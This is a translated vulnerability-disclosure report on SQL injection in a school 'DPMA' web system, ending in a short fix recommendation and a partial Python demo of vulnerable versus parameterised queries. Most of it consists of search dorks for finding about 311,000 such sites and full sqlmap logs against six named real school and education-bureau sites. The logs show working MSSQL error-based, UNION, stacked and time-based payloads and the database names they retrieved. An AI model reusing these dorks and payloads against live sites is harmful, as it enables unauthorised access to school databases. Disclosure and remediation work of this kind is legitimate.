2014-08-12: Details reported to the vendor, awaiting vendor handling
2014-08-17: Vendor confirmed; details disclosed to the vendor only
2014-08-20: Details opened to third-party security partners
2014-10-11: Details disclosed to core white hats and domain experts
2014-10-21: Details disclosed to regular white hats
2014-10-31: Details disclosed to intern white hats
2014-11-10: Details disclosed to the public
As the title says.
So many of these have been accepted already; time for a front-page one.
Keywords (search dorks):
inurl:SPEVideoPage.aspx?KindSetID=
inurl:SPENewsList.aspx?KindSetID=

Injection 1: http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000001&sid=305001
Injection 2: http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30

The search returns about 311,000 results. No idea what system this is... A few examples:
Injection URL: http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3180010017

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:21:41

[06:21:41] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.whwzyx.net\session' as session file
[06:21:41] [INFO] testing connection to the target url
[06:21:42] [INFO] testing if the url is stable, wait a few seconds
[06:21:43] [INFO] url is stable
[06:21:43] [INFO] testing if GET parameter 'TID' is dynamic
[06:21:43] [INFO] confirming that GET parameter 'TID' is dynamic
[06:21:44] [INFO] GET parameter 'TID' is dynamic
[06:21:44] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)
[06:21:44] [INFO] testing sql injection on GET parameter 'TID'
[06:21:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:22:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:22:06] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:22:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:22:16] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:22:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:22:27] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:22:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:22:27] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:22:28] [INFO] target url appears to have 11 columns in query
[06:22:30] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=3180010017 AND 6066=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(110)+CHAR(110)+CHAR(58)+(SELECT (CASE WHEN (6066=6066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(122)+CHAR(108)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=3180010017 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(109)+CHAR(110)+CHAR(110)+CHAR(58)+CHAR(109)+CHAR(66)+CHAR(85)+CHAR(111)+CHAR(105)+CHAR(113)+CHAR(79)+CHAR(74)+CHAR(103)+CHAR(118)+CHAR(58)+CHAR(112)+CHAR(122)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=3180010017; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=3180010017 WAITFOR DELAY '0:0:5'--
---
[06:22:40] [INFO] testing Microsoft SQL Server
[06:22:40] [INFO] confirming Microsoft SQL Server
[06:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[06:22:41] [INFO] fetching database names
[06:22:41] [INFO] the SQL query used returns 8 entries
[06:22:41] [INFO] retrieved: "a1"
[06:22:41] [INFO] retrieved: "bbt"
[06:22:42] [INFO] retrieved: "DPMA"
[06:22:42] [INFO] retrieved: "master"
[06:22:42] [INFO] retrieved: "model"
[06:22:42] [INFO] retrieved: "msdb"
[06:22:43] [INFO] retrieved: "tempdb"
[06:22:43] [INFO] retrieved: "Test"
available databases [8]:
[*] a1
[*] bbt
[*] DPMA
[*] master
[*] model
[*] msdb
[*] tempdb
[*] Test

[06:22:43] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 44 times
[06:22:43] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.whwzyx.net'

[*] shutting down at 06:22:43
Injection URL: http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3340010028

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:22:20

[06:22:20] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.psgh.pudong-edu.sh.cn\session' as session file
[06:22:20] [INFO] testing connection to the target url
[06:22:21] [INFO] testing if the url is stable, wait a few seconds
[06:22:22] [INFO] url is stable
[06:22:22] [INFO] testing if GET parameter 'TID' is dynamic
[06:22:22] [INFO] confirming that GET parameter 'TID' is dynamic
[06:22:23] [INFO] GET parameter 'TID' is dynamic
[06:22:23] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)
[06:22:23] [INFO] testing sql injection on GET parameter 'TID'
[06:22:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:22:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:22:42] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:22:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:22:53] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:22:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:23:03] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:23:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:23:03] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:23:04] [INFO] target url appears to have 11 columns in query
[06:23:05] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=3340010028 AND 4680=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(102)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (4680=4680) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(102)+CHAR(120)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=3340010028 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(110)+CHAR(102)+CHAR(114)+CHAR(58)+CHAR(90)+CHAR(80)+CHAR(78)+CHAR(117)+CHAR(104)+CHAR(117)+CHAR(120)+CHAR(66)+CHAR(104)+CHAR(74)+CHAR(58)+CHAR(102)+CHAR(102)+CHAR(120)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=3340010028; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=3340010028 WAITFOR DELAY '0:0:5'--
---
[06:23:32] [INFO] testing Microsoft SQL Server
[06:23:33] [INFO] confirming Microsoft SQL Server
[06:23:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[06:23:33] [INFO] fetching database names
[06:23:33] [INFO] the SQL query used returns 6 entries
[06:23:34] [INFO] retrieved: "dpma"
[06:23:34] [INFO] retrieved: "GH"
[06:23:34] [INFO] retrieved: "master"
[06:23:34] [INFO] retrieved: "model"
[06:23:34] [INFO] retrieved: "msdb"
[06:23:35] [INFO] retrieved: "tempdb"
available databases [6]:
[*] dpma
[*] GH
[*] master
[*] model
[*] msdb
[*] tempdb

[06:23:35] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 38 times
[06:23:35] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.psgh.pudong-edu.sh.cn'

[*] shutting down at 06:23:35
Injection URL: http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3300010006

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:22:38

[06:22:38] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.fstc.pdedu.sh.cn\session' as session file
[06:22:38] [INFO] testing connection to the target url
[06:22:38] [INFO] testing if the url is stable, wait a few seconds
[06:22:40] [INFO] url is stable
[06:22:40] [INFO] testing if GET parameter 'TID' is dynamic
[06:22:40] [INFO] confirming that GET parameter 'TID' is dynamic
[06:22:41] [INFO] GET parameter 'TID' is dynamic
[06:22:41] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)
[06:22:41] [INFO] testing sql injection on GET parameter 'TID'
[06:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:23:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:23:35] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:23:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:23:45] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:23:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:23:55] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:23:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:23:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:23:57] [INFO] target url appears to have 11 columns in query
[06:23:57] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=3300010006 AND 6013=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(118)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (6013=6013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(108)+CHAR(116)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=3300010006 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(106)+CHAR(118)+CHAR(104)+CHAR(58)+CHAR(97)+CHAR(104)+CHAR(84)+CHAR(68)+CHAR(108)+CHAR(121)+CHAR(106)+CHAR(72)+CHAR(114)+CHAR(122)+CHAR(58)+CHAR(101)+CHAR(108)+CHAR(116)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=3300010006; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=3300010006 WAITFOR DELAY '0:0:5'--
---
[06:23:59] [INFO] testing Microsoft SQL Server
[06:23:59] [INFO] confirming Microsoft SQL Server
[06:24:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[06:24:00] [INFO] fetching database names
[06:24:00] [INFO] the SQL query used returns 5 entries
[06:24:01] [INFO] retrieved: "DPMA"
[06:24:01] [INFO] retrieved: "master"
[06:24:01] [INFO] retrieved: "model"
[06:24:01] [INFO] retrieved: "msdb"
[06:24:02] [INFO] retrieved: "tempdb"
available databases [5]:
[*] DPMA
[*] master
[*] model
[*] msdb
[*] tempdb

[06:24:02] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 36 times
[06:24:02] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.fstc.pdedu.sh.cn'

[*] shutting down at 06:24:02
Injection URL: http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3050010089

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:23:56

[06:23:56] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.azxx.net\session' as session file
[06:23:56] [INFO] testing connection to the target url
[06:23:57] [INFO] testing if the url is stable, wait a few seconds
[06:23:58] [INFO] url is stable
[06:23:58] [INFO] testing if GET parameter 'TID' is dynamic
[06:23:59] [INFO] confirming that GET parameter 'TID' is dynamic
[06:24:00] [INFO] GET parameter 'TID' is dynamic
[06:24:00] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)
[06:24:00] [INFO] testing sql injection on GET parameter 'TID'
[06:24:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:24:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:24:30] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:24:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:24:41] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:24:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:24:51] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:24:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:24:52] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:24:53] [INFO] target url appears to have 11 columns in query
[06:24:55] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=3050010089 AND 5140=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(117)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (5140=5140) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(100)+CHAR(107)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=3050010089 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(118)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(111)+CHAR(81)+CHAR(109)+CHAR(119)+CHAR(103)+CHAR(67)+CHAR(78)+CHAR(97)+CHAR(89)+CHAR(107)+CHAR(58)+CHAR(105)+CHAR(100)+CHAR(107)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=3050010089; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=3050010089 WAITFOR DELAY '0:0:5'--
---
[06:24:56] [INFO] testing Microsoft SQL Server
[06:24:56] [INFO] confirming Microsoft SQL Server
[06:24:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[06:24:57] [INFO] fetching database names
[06:24:58] [INFO] the SQL query used returns 7 entries
[06:24:58] [INFO] retrieved: "azxxweb"
[06:24:58] [INFO] retrieved: "dpma"
[06:24:58] [INFO] retrieved: "dss"
[06:24:59] [INFO] retrieved: "master"
[06:24:59] [INFO] retrieved: "model"
[06:24:59] [INFO] retrieved: "msdb"
[06:24:59] [INFO] retrieved: "tempdb"
available databases [7]:
[*] azxxweb
[*] dpma
[*] dss
[*] master
[*] model
[*] msdb
[*] tempdb

[06:24:59] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[06:24:59] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.azxx.net'

[*] shutting down at 06:24:59
Injection URL: http://yanxiu.ksedu.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1010300035

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:25:16

[06:25:16] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\yanxiu.ksedu.cn\session' as session file
[06:25:16] [INFO] testing connection to the target url
[06:25:17] [INFO] testing if the url is stable, wait a few seconds
[06:25:20] [INFO] url is stable
[06:25:20] [INFO] testing if GET parameter 'TID' is dynamic
[06:25:21] [INFO] confirming that GET parameter 'TID' is dynamic
[06:25:22] [INFO] GET parameter 'TID' is dynamic
[06:25:22] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)
[06:25:22] [INFO] testing sql injection on GET parameter 'TID'
[06:25:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:25:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:25:32] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:25:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:25:43] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:25:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:25:53] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:25:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:25:54] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:25:55] [INFO] target url appears to have 11 columns in query
[06:25:57] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=1010300035 AND 1299=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(115)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (1299=1299) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(104)+CHAR(102)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=1010300035 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(116)+CHAR(115)+CHAR(106)+CHAR(58)+CHAR(68)+CHAR(118)+CHAR(97)+CHAR(107)+CHAR(89)+CHAR(69)+CHAR(69)+CHAR(97)+CHAR(84)+CHAR(79)+CHAR(58)+CHAR(111)+CHAR(104)+CHAR(102)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=1010300035; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=1010300035 WAITFOR DELAY '0:0:5'--
---
[06:26:03] [INFO] testing Microsoft SQL Server
[06:26:03] [INFO] confirming Microsoft SQL Server
[06:26:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[06:26:03] [INFO] fetching database names
[06:26:03] [INFO] the SQL query used returns 5 entries
[06:26:04] [INFO] retrieved: "DPMA"
[06:26:04] [INFO] retrieved: "master"
[06:26:04] [INFO] retrieved: "model"
[06:26:04] [INFO] retrieved: "msdb"
[06:26:04] [INFO] retrieved: "tempdb"
available databases [5]:
[*] DPMA
[*] master
[*] model
[*] msdb
[*] tempdb

[06:26:04] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 45 times
[06:26:04] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\yanxiu.ksedu.cn'

[*] shutting down at 06:26:04
Injection URL: http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/index.aspx?tid=1000020013

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 06:25:38

[06:25:38] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\szxy.ncjy.net\session' as session file
[06:25:38] [INFO] testing connection to the target url
[06:25:38] [INFO] testing if the url is stable, wait a few seconds
[06:25:40] [INFO] url is stable
[06:25:40] [INFO] testing if GET parameter 'tid' is dynamic
[06:25:41] [INFO] confirming that GET parameter 'tid' is dynamic
[06:25:41] [INFO] GET parameter 'tid' is dynamic
[06:25:42] [INFO] heuristic test shows that GET parameter 'tid' might be injectable (possible DBMS: Microsoft SQL Server)
[06:25:42] [INFO] testing sql injection on GET parameter 'tid'
[06:25:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:25:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[06:25:46] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[06:25:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[06:25:57] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[06:25:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[06:26:08] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[06:26:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[06:26:08] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[06:26:10] [INFO] target url appears to have 11 columns in query
[06:26:11] [INFO] GET parameter 'tid' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 27 HTTP(s) requests:
---
Place: GET
Parameter: tid
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: tid=1000020013 AND 4963=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(103)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (4963=4963) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(100)+CHAR(117)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: tid=1000020013 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(119)+CHAR(103)+CHAR(117)+CHAR(58)+CHAR(72)+CHAR(102)+CHAR(86)+CHAR(75)+CHAR(68)+CHAR(101)+CHAR(85)+CHAR(98)+CHAR(77)+CHAR(76)+CHAR(58)+CHAR(115)+CHAR(100)+CHAR(117)+CHAR(58), NULL, NULL, NULL, NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: tid=1000020013; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: tid=1000020013 WAITFOR DELAY '0:0:5'--
---
[06:26:13] [INFO] testing Microsoft SQL Server
[06:26:14] [INFO] confirming Microsoft SQL Server
[06:26:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[06:26:14] [INFO] fetching database names
[06:26:15] [INFO] the SQL query used returns 5 entries
[06:26:15] [INFO] retrieved: "DPMA"
[06:26:15] [INFO] retrieved: "master"
[06:26:15] [INFO] retrieved: "model"
[06:26:16] [INFO] retrieved: "msdb"
[06:26:16] [INFO] retrieved: "tempdb"
available databases [5]:
[*] DPMA
[*] master
[*] model
[*] msdb
[*] tempdb

[06:26:16] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 38 times
[06:26:16] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\szxy.ncjy.net'

[*] shutting down at 06:26:16
Injection point 2: http://www.whwzyx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30002&VideoID=1026&sid=318001

Fix recommendation: filter the input.
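"Filter" is the right instinct, but for an integer key like TID the complete fix is two steps: reject anything that is not a decimal integer, then pass the value as a bound parameter rather than concatenating it into the statement. The block below is an added example, not the DPMA application's code: it shows the lookup as the report implies it is written (raw TID string glued into the SQL) next to the fixed version, against an in-memory SQLite database with a made-up two-table schema standing in for the real MSSQL 'DPMA' database. SQLite cannot run the stacked "; WAITFOR DELAY" payload, but the UNION leak behaves the same way it did in the sqlmap runs.

```python
"""Vulnerable vs. fixed TID lookup. Added example; schema, table and column
names are assumptions, not taken from the DPMA system."""
import re
import sqlite3


def build_demo_db():
    """Constructed demo data: one workroom row plus a credentials table to leak."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE WorkRoom (TID INTEGER PRIMARY KEY, Name TEXT, Owner TEXT);
        CREATE TABLE Users (UserID INTEGER PRIMARY KEY, LoginName TEXT, PasswordHash TEXT);
        INSERT INTO WorkRoom VALUES (3180010017, 'Demo workroom', 'teacher01');
        INSERT INTO Users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


# Three-column version of the 11-column UNION payload sqlmap used against Index.aspx.
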